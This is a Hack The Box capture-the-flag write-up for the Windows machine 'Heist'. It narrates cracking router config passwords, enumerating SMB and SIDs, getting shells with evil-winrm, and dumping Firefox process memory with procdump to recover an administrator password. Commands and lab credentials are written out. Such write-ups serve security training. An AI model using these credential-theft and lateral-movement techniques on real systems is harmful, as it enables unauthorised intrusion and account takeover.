Heist-HTB-Writeup

Today I ‘m gonna solve this windows machine.

Starting with Nmap scan as usual

Here are the scan results

Nmap scan

let’s keep this for a while and check the web page

I found a simple login page but it was interesting that we can login as a guest

login page

issues page

After logging in as a guest I found this issues page where the user Hazard has an issue with his cisco router and he shared an attachment it could be useful.

config.txt

Cool he shared a config sample that contains 2 usernames and 3 passwords

rout3r password

admin password

I used john to crack the type 5 password

type 5 password cracked

This password must belongs to the user Hazard who shared the config text file

After many tries I wasn’t able to login with any user in the login page even after adding @heist.htb after every username so I tried logging in with smbmap the only useful user was hazard I found this

smbmap -u hazard -p stealth1agent -H heist.htb

Only IPC$ was accessible as read only file after some more search it’s possible to login via rpcclient as hazard

So I used lookupsid.py and found that there are other users .

python3 lookupsid.py hazard:stealth1agent@heist.htb

by using evil-winrm we got a shell as user chase

evil-winrm -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d'

user chase shell

And finally we got the user’s flag

1st flag

So now it’s time to escalate to the system’s administrator

After a lot of searching there wasn’t many files I was able to access but we can see that there is a file called wwwroot in C:inetpub we can access but cant see what’s inside and if you remember we tried to login at the beginning in a login.php page it could be stored inside wwwroot I tried reading it and I was successfully able to

cat C:\inetpub\wwwroot\login.php

And found this piece of valuable php code

admin credentials

It has admin credentials but we need to crack this hash first

91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040

As usual i tried john with rockyou.txt but got nothing

failed

I checked the processes running on this machine after failing to crack the hash

processes running on the machine

Not really interesting but it’s the second time to see firefox the first was in documents let’s analyze these processes with procdumb

upload /path_to_procdumb_on_attacking_machine

I will try to dumb them ascendingly

./procdump64.exe -ma "pid"

I tried reading it on the machine but it’s harder to se

download file_name

Finally after the download is done we got the dumb it’s time to search for what we need

Quick tip you don’t need to download the whole file if took too long downloading 15% was enough for me

Unfortunately the linux machine kept lagging every time i tried to open the file and using grep was useless it just confirm if what you search for is available or not

So i used notepad on windows instead and it was pretty fast to get the password

password

As you see the password is for admin@support.htb

admin@support.htb:4dD!5}x/re8]FBuZ

We can login with these credentials in the login.php page but nothing new was there

Let’s try Evil-WinRM again but as administrator this time

evil-winrm -i heist.htb -u administrator -p '4dD!5}x/re8]FBuZ'

Bingo.. We are logged in as administrator and finally got the root.txt

root.txt

I wish it was an easy simple writeup.

Respect on HTB it won’t take a minute

Twitter